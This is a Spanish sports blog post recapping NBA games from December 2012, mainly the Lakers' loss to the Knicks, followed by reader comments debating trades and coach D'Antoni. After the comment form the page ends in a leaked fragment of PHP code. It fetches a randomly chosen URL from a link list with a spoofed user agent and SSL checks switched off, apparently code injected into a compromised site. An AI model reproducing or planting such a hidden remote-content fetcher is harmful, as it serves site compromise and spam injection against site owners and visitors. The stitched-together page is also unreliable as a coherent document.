La Crónica: ¿Hasta cuando?

14 de December de 2012 por Viva_Dirk

Con la derrota de ayer en el Madison los Lakers registran un 9-14 en su balance, lejos de playoffs. Todas las alarmas deberían estar funcionando y cada vez parece más incierto el día de la vuelta de Nash y los motivos por los que no juega Pau Gasol. Mientras tanto el reloj y los partidos empiezan a correr en contra del macroproyecto angelino. Anoche, los Knicks volvieron a masacrar desde la larga distancia con un 12 de 25 en triples y un Carmelo en modo MVP. Los Lakers dominaron el rebote y tuvieron buenas actuaciones de varios hombres pero eso no vale a día de hoy para ganar en New York (107-116).

En cambio, los Hawks vencieron en casa a los Bobcats con un gran acierto en el tiro. Un 57% en tiros de campo y un 48% en triples no es algo contra lo que puedan luchar los gatitos, como tampoco los mas de 50 puntos que llegaron desde el banco de Atlanta. Rara rotación de los Bobcats donde nadie disfrutó de muchos minutos de juego (90-113).

En Portland vimos una gran actuación del rookie Damian Lillard que ocupa el primer puesto en la carrera por el ROY. Nada menos que frente a los Spurs se fue a 29 puntos, 7 rebotes y 6 asistencias con un 50% de acierto. LaMarcus le acompañó en la anotación y Hickson bajo los tableros. Mal partido de los Spurs donde solo Parker estuvo medianamente acertado (90-98). 

PREMIOS

MVP: Y rookie, todo en uno. Damian Lillard se salió ante uno de los equipos más duros de la competición. Sus 29 puntos, 7 rebotes y 6 asistencias no obtuvieron respuesta por parte tejana.

Sorpresa: El segundo mejor hombre de los Lakers fue Metta World Peace con 23 puntos, 6 rebotes y 2 robos. Ivan Johnson disfrutó de minutos y respondió 16 puntos y 8 rebotes.

Decepción: Podemos elegir entre la enésima derrota de los Lakers o los 10 partidos seguidos perdiendo de los Bobcats.

Esfuerzo en vano: Un día más, buena actuación de Kobe Bryant que se queda sin premio. 31 puntos, 10 rebotes y 6 asistencias que engrosan esa (posiblemente falaz) estadística que dice que cuando Kobe anota más de 30 puntos los Lakers prácticamente no tienen opciones de ganar.

Imágenes | AP Photos / Getty Images

Comenta

9 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    A todo esto, los Grizzlies han fichado a Hollinger como vicepresidente de operaciones

      Citar

  2. Esteban dice:
    #2

    jua para cuando un trade de los lakers? tanto pouede mejorar el equipo nash y gasol como para encadenar 15 victorias consecutivas y no terminar septimo u octavo en el oeste y cruzarse con spurs o thunder?

    no me canso de repetirlo, viendo lo lesionado que esta nash, calderon y bargnani por gasol
    y morrow por jordan hill

    asi al menoes tednrias 3 tiradores mas para rodear a howard

      Citar

  3. Esteban dice:
    #3

    las 4 vistorias (incluyendo uan en el garden) que prometia DIESTRO en los proximos 5 juegos, ya no van a poder ser!!!

    yo dije 2 y viendo jugar a los lakers creo que hasta me extralimite

      Citar

  4. Esteban dice:
    #4

    varios portales se estan haciendo mucho eco del posible interes de los lakers por delonte west, pues creo que seria una incorporacion de lujo, riesgosa por su salud claro, pero seria un 1/2 con capacidad de anotar que los lakers no tienen en el banco, y nisiquiera entre los titulares con la falta de nash

    con west y kamison la bnaca de los lakers tiene otra pinta, y si consiguen algun tirador por jordan hill, no seria necesario cambiar a gasol

      Citar

  5. nba dice:
    #5

    una palabra, DEFENSA, el resto de cosas vendrian rodadas

      Citar

  6. Esteban dice:
    #6

    nba:
    una palabra, DEFENSA, el resto de cosas vendrian rodadas

    pues eso es pedir peras al olmo, los lakers no jugaran defensa mientras este d´antoni, eso puedo asegurarlo, morira con su manual

    paso en los knicks donde prefirio irse antes que cambiar sus ideas, y los knicks mejoraron el año pasado con woodson y su defensiva

    por ende hay que pedir cosas posibles, y west y un tirador por hill pueden mejorar la pesima rotacion de este equipo

      Citar

  7. Ruxixón dice:
    #7

    Yo no me explico como con Mike Brown no defendían nada,como gurú de los esquemas defensivos,y con D’Antoni,gurú del ataque,la defensa sigue siendo la misma.¿Hasta que punto los jugadores se eximen de su responsabilidad?Que están en la NBA leñe,habiendo dedicado toda su vida al baloncesto.

      Citar

  8. GreenPride dice:
    #8

    Debacle total de los Lakers mientras estuvo Melo… luego los Knicks se vieron con el partido ganado, se relajaron en exceso y los Lakers se acercaron sin llegar a tener opciones reales de victoria. Una cosa es intentar ser un equipo ofensivo y otra que tu defensa simplemente no exista. A este nivel les gana cualquiera y yo sigo viendo difícil el cambio sólo con la vuelta de Nash y Gasol.
    Creo que los mandatarios de los Lakers se equivocaron con la elección de D’Antoni ya que su estilo no va con los jugadores que tiene y parece que como muchos temíamos no tiene otro plan.
    Mientras siguen todo tipo de rumores y a D’Antoni se le ve claramente nervioso e incapaz de resolver la situación. Vermemos que pasa en las próximas semanas pero empieza a acabársele el crédito.
    Los Knicks muy bien, a lo suyo destrozaron a la defensa laker con un gran acierto de todos y luego sestearon peligrosamente tras la lesión de Melo identificando uno de sus posibles problemas como es las difi8cultades en estático para anotar sin Anthony. Aún así están haciendo un temporadón

      Citar

  9. Esteban dice:
    #9

    Q pensara howard, q se quejaba del equipo q tenia en orlando y el magic el año pasado tenian un recod mucho mejor q los lakers a esta altura de la temporada

    de no mejorar muchisimo, es decir, una final de conferencia como minimo, howard se panteara seguir o no

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>